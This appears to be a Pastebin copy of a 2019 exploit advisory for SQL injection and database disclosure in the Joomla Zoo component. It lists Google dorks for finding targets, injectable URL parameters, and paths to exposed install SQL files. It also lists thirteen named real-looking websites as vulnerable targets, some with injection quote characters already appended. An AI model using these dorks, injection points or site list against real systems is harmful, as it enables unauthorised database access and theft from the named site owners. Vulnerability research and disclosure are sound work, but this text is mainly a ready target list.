Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla Zoo by YooTheme Components 3.3.10 SQL Injection / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 30/01/2019
- # Vendor Homepage : yootheme.com
- # Software Download Link : yootheme.com/zoo
- # Software Information Link : extensions.joomla.org/extension/zoo/
- # Software Version : 3.3.33 and 3.3.10
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:"/index.php?option=com_zoo"
- inurl:''/administrator/components/com_zoo/''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- CWE-200 [ Information Exposure ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019010283
- ####################################################################
- # Description about Software :
- ***************************
- ZOO component for Joomla 1.7 developed by YOOtheme .
- ZOO is a flexible and powerful content application builder to manage your content.
- ####################################################################
- # Impact :
- ***********
- * An attacker might be able inject and/or alter existing
- SQL statements which would influence the database exchange.
- * SQL injection vulnerability in the Joomla Zoo by YooTheme Components 3.3.10 and other versions
- because, it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- * Exploiting this issue could allow an attacker to compromise the application, read,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- If the webserver is misconfigured, read & write access to the filesystem may be possible.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_zoo&view=[SQL Injection]
- /index.php?option=com_zoo&view=frontpage&Itemid=[SQL Injection]
- /index.php?option=com_zoo&view=item&layout=item&Itemid=[SQL Injection]
- /index.php?option=com_zoo&view=category&Itemid=[SQL Injection]
- /index.php?option=com_zoo&task=category&category_id=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_zoo&view=category&layout=category&Itemid=[SQL Injection]
- /index.php?Itemid=[ID-NUMBER]&option=com_zoo&view=item&category_id=[ID-NUMBER]&item_id=[SQL Injection]
- ####################################################################
- # Database Disclosure Exploit :
- ***************************
- /administrator/components/com_zoo/installation/index.sql
- /administrator/components/com_zoo/installation/install.sql
- /administrator/components/com_zoo/installation/uninstall.sql
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] conycap.com/cloud/administrator/components/com_zoo/installation/index.sql
- [+] cabinete-stomatologice.biz/index.php?option=com_zoo&view=category&Itemid=3
- [+] bestkitchenandappliances.com/index.php?Itemid=52&option=com_zoo&view=item&category_id=60&item_id=41
- [+] socialmediasoluciones.com/index.php?option=com_zoo&task=category&category_id=25&Itemid=234
- [+] bordervalley.co/index.php?option=com_zoo&view=item&layout=item&Itemid=262
- [+] realstour.ru/index.php?option=com_zoo&view=category&Itemid=171
- [+] animalwatcherspetresort.com/index.php?option=com_zoo&view=frontpage&Itemid=7%27
- [+] mail.administratorsone.com/index.php?option=com_zoo&view=category&Itemid=226
- [+] rt82.de/blog/index.php?option=com_zoo&view=item&layout=item&Itemid=110
- [+] bestkitchenandappliances.com/index.php?option=com_zoo&view=category&layout=category&Itemid=58
- [+] realstour.ru/index.php?option=com_zoo&task=item&item_id=91&Itemid=212
- [+] virtual-managing.com/index.php?option=com_zoo&view=1%27
- [+] locihouse.com/index.php?option=com_zoo&view=category&Itemid=4%27
- ####################################################################
- # Example SQL Database Error :
- *****************************
- Strict Standards: Non-static method JLoader::import() should not be
- called statically in /home/content/41/5733041/html/_sites
- /locihouse.com/libraries/joomla/import.php on line 29
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment